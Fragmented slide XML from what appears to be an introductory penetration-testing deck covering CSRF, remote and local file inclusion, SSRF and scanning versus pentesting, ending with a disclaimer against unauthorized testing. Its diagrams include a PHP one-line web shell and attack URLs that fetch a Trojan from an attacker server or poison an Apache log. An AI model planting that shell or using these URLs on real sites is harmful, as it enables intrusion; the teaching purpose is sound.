            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/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Limit upload folder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5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5C52-EECD-D36D-A04F-9C4FBE5F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- CSRF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F52E-698F-DDF5-74A5-DB51F17D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511A-DD49-1969-091A-C95551C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A86-7270-DD0B-1F1A-DD949DE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25730-CC83-64E4-089F-D7FE2C8B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5" y="2683188"/>
            <a:ext cx="906738" cy="7193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837C33-D14C-4DB4-C877-BC82D6FD5262}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1281903" y="3212996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33157C-44E0-ABD0-5E4F-1E805F83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92" y="2690064"/>
            <a:ext cx="906738" cy="7193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3DD43-2D35-C011-E153-2B869CCD91E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315200" y="3219872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123EEA-90AA-2153-D1F5-2C984D9DA191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2506133" y="3042844"/>
            <a:ext cx="2595927" cy="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07F494-4E20-21F8-988A-5C7195C80A06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2664878" y="2614101"/>
            <a:ext cx="22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url?newPwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xxxxxx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Hacker-token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4A56A-B191-E5ED-8A86-EA24E0EC5C2F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8539430" y="3038036"/>
            <a:ext cx="2625281" cy="11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0C5FD-1A2A-E8C9-FAD2-ACB3B0DB865D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5102060" y="2736049"/>
            <a:ext cx="1864316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 Page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46671-DB0B-61D4-55BC-EE45B44225E5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966376" y="3049720"/>
            <a:ext cx="666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3B9178-34B6-599A-CA48-021E6B03389F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8624441" y="2588055"/>
            <a:ext cx="22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url?newPwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xxxxxx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altLang="zh-CN" dirty="0"/>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-token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2AF69-0AB5-1ED2-9395-B7CD6173FC3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11164711" y="2659122"/>
            <a:ext cx="2381956" cy="7578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User’s password changed to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xxxxxx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D0615CD-0E7E-8197-80D9-E280725D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5" y="4960454"/>
            <a:ext cx="906738" cy="7193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F013999-046E-FBB9-2FB0-BE666CE005E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1281903" y="5490262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00F8A42-A924-928F-6A29-0A69B122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92" y="4967330"/>
            <a:ext cx="906738" cy="71931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EC823A8-0CCB-1AD0-5A1B-667631DBE9C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315200" y="5497138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Web-Admin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6AE2C5-A199-BA90-0314-36C38151E32C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2506133" y="5320110"/>
            <a:ext cx="2595927" cy="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40B8EF-575F-01AC-403C-E3ED10247F18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2509750" y="4888690"/>
            <a:ext cx="252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url?addAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=Hacker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Hacker-token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05654D-5632-7DDF-6D8B-8EE989A9C315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8539430" y="5326986"/>
            <a:ext cx="2625281" cy="11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F9084D-D7F3-782B-8E90-732D264D476B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5102060" y="5013315"/>
            <a:ext cx="1864316" cy="6273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Website-User management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701393-6E6C-EA40-6B92-15E066C67756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>
            <a:off x="6966376" y="5326986"/>
            <a:ext cx="666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DDD7D1-ED46-12E3-A782-198306AFA963}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8572401" y="4865321"/>
            <a:ext cx="252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url?addAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=Hacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-token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01229-C3E3-CFBC-2198-4DBE82C6EE8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11164711" y="4959757"/>
            <a:ext cx="2381956" cy="7578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Hacker is the admin of this website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3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5C52-EECD-D36D-A04F-9C4FBE5F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 Vuln.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F52E-698F-DDF5-74A5-DB51F17D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511A-DD49-1969-091A-C95551C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6769" y="7390555"/>
            <a:ext cx="4632960" cy="438150"/>
          </a:xfrm>
        </p:spPr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A86-7270-DD0B-1F1A-DD949DE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7BDE5-B4B0-D1EE-00C4-703B2695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34" y="2673280"/>
            <a:ext cx="906738" cy="719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18A87-8224-ED2A-6772-A61CC4A5717F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2534442" y="3203088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35124-0380-50D2-03C1-A8B66E45719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3758672" y="3020987"/>
            <a:ext cx="6618494" cy="11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7DF96-4619-51BF-C9D4-DC19BB9D084F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10377166" y="2472079"/>
            <a:ext cx="1684302" cy="1097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Vuln.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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include(‘$file’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>…?&gt;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D0EBF-7B44-39E1-11FD-6451EA9BAB23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7255969" y="1891462"/>
            <a:ext cx="3413760" cy="5076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@eval($_POST['a']); ?&gt;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219D9-B293-C4E2-EC72-0103DA9DDB1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3758672" y="2651655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http://xx/Vuln.php?file=http://hackServer/Tojan.txt?a=payload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E4FC009-96C9-5BEC-89BD-58AB2B93C577}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="0"/>
            <a:endCxn id="23" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="5016638" y="433949"/>
            <a:ext cx="527996" cy="39506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A38317-969B-9821-6EC4-CD1FA5552A18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3280022" y="1721310"/>
            <a:ext cx="397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a Trojan.txt in own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00F7F-1634-614E-439B-7452E2B590A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7255968" y="1568688"/>
            <a:ext cx="312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http://hackServer/Trojan.txt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BCFD1-8F41-1AA6-2D57-5A7E0E6C7733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12061468" y="3020987"/>
            <a:ext cx="499750" cy="7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C22F5F-7214-27A3-0AFA-883096D912AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12561218" y="2668442"/>
            <a:ext cx="1337662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Shell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909E80-A523-3B11-155C-D8DBBFC7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34" y="4537341"/>
            <a:ext cx="906738" cy="7193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2893787-0AD8-916E-8445-54D4B7127688}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2534442" y="5067149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BDB042-B9AB-92EB-5546-259A615D358F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3758672" y="4881034"/>
            <a:ext cx="6662703" cy="1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8E65C0-4EA1-EE39-868D-C396538342F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10421375" y="4352461"/>
            <a:ext cx="1684302" cy="10571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Vuln.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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include(‘$file’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>…?&gt;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4023DE-70C3-C717-F6B9-E4758A0D2D8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3811716" y="4394504"/>
            <a:ext cx="64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http://xx/Vuln.php?file=http://xx/upload/Trojan.txt?a=payload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576893-216B-1C06-508E-74173796C229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12105677" y="4866283"/>
            <a:ext cx="455541" cy="1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D631CF-862C-0A10-0A20-782348E00967}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12561218" y="4506627"/>
            <a:ext cx="1337662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Shell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1BE79DD-D973-1BAA-71D8-9C5FF165A3DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="42" idx="0"/>
            <a:endCxn id="54" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="5033279" y="2323679"/>
            <a:ext cx="485686" cy="3941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B6F0F0-5931-E20E-8A8B-4F0169F65B38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3262405" y="3585432"/>
            <a:ext cx="397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pload a Trojan.txt in xx Website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0B548-374A-40D8-0075-F6749DEE924F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7246942" y="3797833"/>
            <a:ext cx="3379890" cy="5076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@eval($_POST['a']); ?&gt;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39E89C-92F2-49D0-050A-A75369255E27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7246942" y="3475059"/>
            <a:ext cx="299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http://xx/upload/Trojan.txt</a:t>
            </a:r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ADC2DB9-DA89-715E-BE20-66235350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34" y="6409701"/>
            <a:ext cx="906738" cy="7193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B6082B2-00DD-AC27-5B1B-5651D6FA6671}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2534442" y="6939509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5DD309-205E-22BC-368E-88D70A0AEEB3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 flipV="1">
            <a:off x="3758672" y="6753394"/>
            <a:ext cx="6662703" cy="1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5010945-F246-48DF-BCC4-F826CA938330}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10421375" y="6224821"/>
            <a:ext cx="1684302" cy="10571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Vuln.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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include(‘$file’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>…?&gt;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150A7-2CCC-D66B-373D-A402BAB786A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3811716" y="6420603"/>
            <a:ext cx="666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http://xx/Vuln.php?file=../../../../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" altLang="zh-CN" dirty="0"/>
              <a:t>var/log/apache2/access.log</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&amp;a=payload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B048F1-EFF8-3018-4FD4-A356DC7171E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2105677" y="6738643"/>
            <a:ext cx="455541" cy="1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2E3FD8D-7B46-75D6-1AAB-6BC9AAA06D98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12561218" y="6378987"/>
            <a:ext cx="1337662" cy="719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Shell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42EBA74-E0C5-7BE4-F8A1-01CAA3736165}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="70" idx="0"/>
            <a:endCxn id="79" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="5033279" y="4196039"/>
            <a:ext cx="485686" cy="3941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A4C21D-E6E5-3ECB-BBB0-13F3BE4E3558}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3262405" y="5457792"/>
            <a:ext cx="397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 payload in log of xx Website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921D9B-7C63-952F-4B57-A8D1637BDE9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7246942" y="5670193"/>
            <a:ext cx="3680174" cy="5076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@eval($_POST['a']); ?&gt;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30E29B-06A7-7703-E8F7-6888C46A6CE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7246941" y="5347419"/>
            <a:ext cx="329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zh-CN" dirty="0"/>
              <a:t>/var/log/apache2/access.log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71E721-CE25-D84D-00EA-97A9864BC51F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620771" y="2447897"/>
            <a:ext cx="236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RFI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote File Inclusion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99644E-6F65-BEBA-9E99-71D513F91430}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="5091758"/>
            <a:ext cx="187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LFI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local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385134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DCA-804F-54DC-8CE7-945197EC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1270-FCBA-8318-E8A0-DC1EC600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Söhne"/>
              </a:rPr>
              <a:t>SSRF (Server-Side Request Forgery):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/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Explanation: SSRF is a security vulnerability that allows an attacker to make requests on behalf of the server, potentially leading to unauthorized access to internal resources, data exposure, or remote code execution.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Arbitrary File Download Vulnerability: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/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Explanation: Arbitrary file download vulnerabilities allow an attacker to download files from a server without proper authorization. This can lead to the exposure of sensitive information, configuration files, or other critical data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Weak Password Vulnerability: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/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Explanation: A weak password vulnerability occurs when user accounts are protected by easily guessable or common passwords, increasing the risk of unauthorized access and potential security breaches.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Unauthorized Access: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/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Explanation: Unauthorized access refers to the ability of an attacker to gain entry to a system or resource without proper authorization. This can result from weak authentication mechanisms, misconfigurations, or exploitation of vulnerabilities, leading to data breaches or unauthorized actions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Hardcoding vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Explanation: A hardcoding vulnerability occurs when sensitive information is directly embedded in source code rather than securely stored, posing risks of information exposure and making maintenance challenging.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756-6ACF-1AEF-A13F-240CF6B6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7B03-CE61-DA1D-7546-6B178906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F95C-735A-4864-41CB-4C904EE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ECF6-745C-B798-071E-4FEEFDC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94048"/>
            <a:ext cx="13481191" cy="1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6600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B034-1B19-1625-1109-772C7218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2287881"/>
            <a:ext cx="13167360" cy="4517506"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/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Any form of unauthorized penetration testing is illegal. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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Please do not conduct penetration testing in an unauthorized state. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4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If you use the content shared in this PPT to conduct illegal penetration testing, I will not be responsible for the results.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B7BC-4E81-A7A4-DE76-44305BD4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024D-7D48-9F6F-BF85-A617BA92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3F66-2619-E3FC-3301-4437E5C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B073-D7C4-7F0E-B5CE-E56BFDB1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terms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CAE8-D5F3-207A-81BD-C1D0C0AC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9BDC-FBB8-5A07-8E1D-1FB4F03C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A569-8C1B-35ED-E952-C1ED15B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5DE97E-25AE-FB2E-0118-5A1BB1D63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938811"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="417688" y="1465648"/>
          <a:ext cx="7631289" cy="616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3EFE24E-D512-CBE6-4B17-1A9DFF8E9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207739"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8502791" y="1582421"/>
          <a:ext cx="5709921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585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B0AD-24D0-F6B0-855E-1A9B09F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– Scan &amp; Pentest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3DC6-93D0-55D4-30D9-815FAA9E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1158-74E2-8DD2-DB30-5E3CB6F2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CB01-6613-E649-2E98-560662C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A6AD06-8DB9-EFD4-01DC-D0F5E593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5134"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1003003" y="1796903"/>
          <a:ext cx="12160104" cy="53340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24718">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2153449921"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4359349">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2030741653"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4976037">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="287687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Vulnerability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Penetration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8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kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr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automated tools </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0"/>
                        <a:t>to detect known vulnerabilities in the system without simulating real attacks.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Simulates real attacks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discovering unknown vulnerabilities through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manual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and automated means.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kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Purposes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Identifies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known</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0"/>
                        <a:t> vulnerabilities in the system, providing a list of issues, focusing on discovering specific known vulnerabilities.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Evaluates the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overall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security of systems, networks, or applications, discovering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potential threats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kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>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Generates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report of known vulnerabilities</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0"/>
                        <a:t>, listing issues present in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Provides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comprehensive security risk assessment</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0"/>
                        <a:t>, may include the discovery of unknown vulnerabilities.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2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Automated, fast, suitable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0"/>
                        <a:t> for frequent scanning.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Simulates real threats, discovers unknown vulnerabilities, provides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comprehensive</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0"/>
                        <a:t> security assessment.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Only detects known vulnerabilities, may produce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false positives</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0"/>
                        <a:t>, does not provide a comprehensive security assessment.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Higher cost, time-consuming</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0"/>
                        <a:t>, not suitable for routine and frequent scans.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1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B073-D7C4-7F0E-B5CE-E56BFDB1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38AA-E955-F4CC-51FB-C8FB1EB3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98" y="1831056"/>
            <a:ext cx="13167360" cy="5431156"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0"/>
              <a:t>Web Penetration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>APP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0"/>
              <a:t>mini-program Penetration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C4043"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Intranet Penetration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C4043"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>binary Penetration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C4043"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IoT Penetration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C4043"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cloud Security Penetration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C4043"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Virtualization and Container Penetration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C4043"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Internet of Vehicles Penetration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="36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CAE8-D5F3-207A-81BD-C1D0C0AC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9BDC-FBB8-5A07-8E1D-1FB4F03C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A569-8C1B-35ED-E952-C1ED15B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568-5741-199D-AB9E-8D2F0FE6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0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>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AE38-CA4E-A81E-E6E6-6929ECD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94C7-3236-3365-3A50-1E7BF5BC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E169-AB44-AE31-BFA7-D81838ED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84EFBFC-01A6-30B4-4545-2C715D357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085194"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="731520" y="1465648"/>
